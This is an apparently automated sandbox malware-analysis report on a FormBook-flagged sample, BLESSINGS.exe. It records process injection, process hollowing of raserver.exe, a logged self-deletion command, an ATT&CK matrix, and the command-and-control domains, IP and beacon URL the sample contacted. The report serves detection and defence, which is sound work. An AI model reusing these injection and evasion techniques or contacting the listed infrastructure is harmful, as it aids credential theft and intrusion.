          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764D3B mov eax, dword ptr fs:[00000030h]8_2_01764D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764D3B mov eax, dword ptr fs:[00000030h]8_2_01764D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764D3B mov eax, dword ptr fs:[00000030h]8_2_01764D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017E8DF1 mov eax, dword ptr fs:[00000030h]8_2_017E8DF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174D5E0 mov eax, dword ptr fs:[00000030h]8_2_0174D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174D5E0 mov eax, dword ptr fs:[00000030h]8_2_0174D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]8_2_017FFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]8_2_017FFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]8_2_017FFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]8_2_017FFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov ecx, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808D34 mov eax, dword ptr fs:[00000030h]8_2_01808D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01761DB5 mov eax, dword ptr fs:[00000030h]8_2_01761DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01761DB5 mov eax, dword ptr fs:[00000030h]8_2_01761DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01761DB5 mov eax, dword ptr fs:[00000030h]8_2_01761DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017635A1 mov eax, dword ptr fs:[00000030h]8_2_017635A1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176FD9B mov eax, dword ptr fs:[00000030h]8_2_0176FD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176FD9B mov eax, dword ptr fs:[00000030h]8_2_0176FD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]8_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]8_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]8_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]8_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175746D mov eax, dword ptr fs:[00000030h]8_2_0175746D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CC450 mov eax, dword ptr fs:[00000030h]8_2_017CC450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CC450 mov eax, dword ptr fs:[00000030h]8_2_017CC450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A44B mov eax, dword ptr fs:[00000030h]8_2_0176A44B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808CD6 mov eax, dword ptr fs:[00000030h]8_2_01808CD6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176BC2C mov eax, dword ptr fs:[00000030h]8_2_0176BC2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]8_2_017B6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]8_2_017B6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]8_2_017B6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]8_2_017B6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F14FB mov eax, dword ptr fs:[00000030h]8_2_017F14FB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6CF0 mov eax, dword ptr fs:[00000030h]8_2_017B6CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6CF0 mov eax, dword ptr fs:[00000030h]8_2_017B6CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6CF0 mov eax, dword ptr fs:[00000030h]8_2_017B6CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180740D mov eax, dword ptr fs:[00000030h]8_2_0180740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180740D mov eax, dword ptr fs:[00000030h]8_2_0180740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180740D mov eax, dword ptr fs:[00000030h]8_2_0180740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174849B mov eax, dword ptr fs:[00000030h]8_2_0174849B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174FF60 mov eax, dword ptr fs:[00000030h]8_2_0174FF60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174EF40 mov eax, dword ptr fs:[00000030h]8_2_0174EF40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176E730 mov eax, dword ptr fs:[00000030h]8_2_0176E730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01734F2E mov eax, dword ptr fs:[00000030h]8_2_01734F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01734F2E mov eax, dword ptr fs:[00000030h]8_2_01734F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175F716 mov eax, dword ptr fs:[00000030h]8_2_0175F716
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CFF10 mov eax, dword ptr fs:[00000030h]8_2_017CFF10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CFF10 mov eax, dword ptr fs:[00000030h]8_2_017CFF10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A70E mov eax, dword ptr fs:[00000030h]8_2_0176A70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A70E mov eax, dword ptr fs:[00000030h]8_2_0176A70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017737F5 mov eax, dword ptr fs:[00000030h]8_2_017737F5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180070D mov eax, dword ptr fs:[00000030h]8_2_0180070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180070D mov eax, dword ptr fs:[00000030h]8_2_0180070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01748794 mov eax, dword ptr fs:[00000030h]8_2_01748794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808F6A mov eax, dword ptr fs:[00000030h]8_2_01808F6A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7794 mov eax, dword ptr fs:[00000030h]8_2_017B7794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7794 mov eax, dword ptr fs:[00000030h]8_2_017B7794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7794 mov eax, dword ptr fs:[00000030h]8_2_017B7794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174766D mov eax, dword ptr fs:[00000030h]8_2_0174766D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01800EA5 mov eax, dword ptr fs:[00000030h]8_2_01800EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01800EA5 mov eax, dword ptr fs:[00000030h]8_2_01800EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01800EA5 mov eax, dword ptr fs:[00000030h]8_2_01800EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]8_2_01747E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]8_2_01747E41
          Source: C:\Users\user\Desktop\BLESSINGS.exe; Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\BLESSINGS.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 91.195.241.137 80
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\BLESSINGS.exe; Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\BLESSINGS.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\raserver.exe; Thread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: D90000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\BLESSINGS.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\BLESSINGS.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\BLESSINGS.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: DAB008
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\BLESSINGS.exeQueries volume information: C:\Users\user\Desktop\BLESSINGS.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 812 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 121 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | Input Capture 1 | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 3 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 812 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Hidden Files and Directories 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information 3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Software Packing 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 339345; Sample: BLESSINGS.exe; Startdate: 13/01/2021; Architecture: WINDOWS; Score: 100.]
          Process chain: BLESSINGS.exe started AddInProcess32.exe, which injected into explorer.exe; explorer.exe started raserver.exe, which started cmd.exe, which started conhost.exe.
          Dropped by BLESSINGS.exe: C:\Users\user\AppData\...\AddInProcess32.exe (PE32) and C:\Users\user\AppData\...\BLESSINGS.exe.log (ASCII).
          DNS/IP: explorer.exe contacted www.quintred.com (91.195.241.137, 49755, 80, SEDO-ASDE Germany) and www.toweroflifeinc.com; the sample also resolved www.hotvidzhub.download.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          BLESSINGS.exe | 45% | Virustotal |
          BLESSINGS.exe | 15% | ReversingLabs |
          BLESSINGS.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          8.2.AddInProcess32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.quintred.com | 4% | Virustotal |
          www.hotvidzhub.download | 0% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.quintred.com | 91.195.241.137 | true | true | | unknown
          www.toweroflifeinc.com | unknown | unknown | true | | unknown
          www.hotvidzhub.download | unknown | unknown | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://www.quintred.com/jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P | true | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

                            • Avira URL Cloud: safe
                            unknown
                            http://www.droriginals.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.sterlworldshop.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.toweroflifeinc.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.margosbest.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.toweroflifeinc.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.registeredagentfirm.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.kornteengoods.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.quintred.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.cositasdepachecos.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.registeredagentfirm.com/jqc/www.asacal.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.screwtaped.com/jqc/www.11sxsx.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.carterandcone.comlexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.sterlworldshop.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.registeredagentfirm.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                              high
                              http://www.toweroflifeinc.com/jqc/www.quintred.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cnexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.11sxsx.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                                high
                                http://www.margosbest.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.the343radio.com/jqc/www.droriginals.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.droriginals.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.asacal.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers8explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                                  high
                                  https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_landeraserver.exe, 0000000F.00000002.688978959.0000000004F1F000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.quintred.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.internetmarkaching.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.hotvidzhub.download/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.kornteengoods.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.the343radio.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.asacal.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs

                                    Public

                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                    91.195.241.137 | unknown | Germany | 47846 | SEDO-ASDE | true

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:339345
                                    Start date:13.01.2021
                                    Start time:21:23:17
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:BLESSINGS.exe
                                    Cookbook file name:default.jbs
